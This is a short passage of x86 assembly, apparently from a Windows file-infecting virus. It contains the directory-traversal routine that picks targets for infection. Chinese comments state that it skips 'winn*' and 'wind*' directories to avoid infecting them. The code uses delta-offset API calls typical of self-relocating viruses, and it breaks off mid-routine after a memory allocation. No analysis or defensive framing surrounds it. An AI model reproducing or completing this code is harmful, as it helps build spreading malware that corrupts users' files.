dir_test: ;是否是目录?
mov eax,[ebx+w32fd.dwFileAttributes]
lea edi,[esi+sxd.WF32.cFileName]
test eax,FILE_ATTRIBUTE_DIRECTORY
je file_test
cmp B [edi],'.' ;skip '.' and '..' directories
je find_file_next
mov eax,[edi]
or eax,20202020h
cmp eax,'winn' ;排除感染winn*或wind*目录。。。。
je find_file_next
cmp eax,'wind'
je find_file_next
invoke ebp+aSetCurrentDirectory-@@0,edi
xchg ecx,eax
jecxz find_file_next
invoke ebp+aVirtualAlloc-@@0,0,sxd.size,MEM_COMMIT,PAGE_READWRITE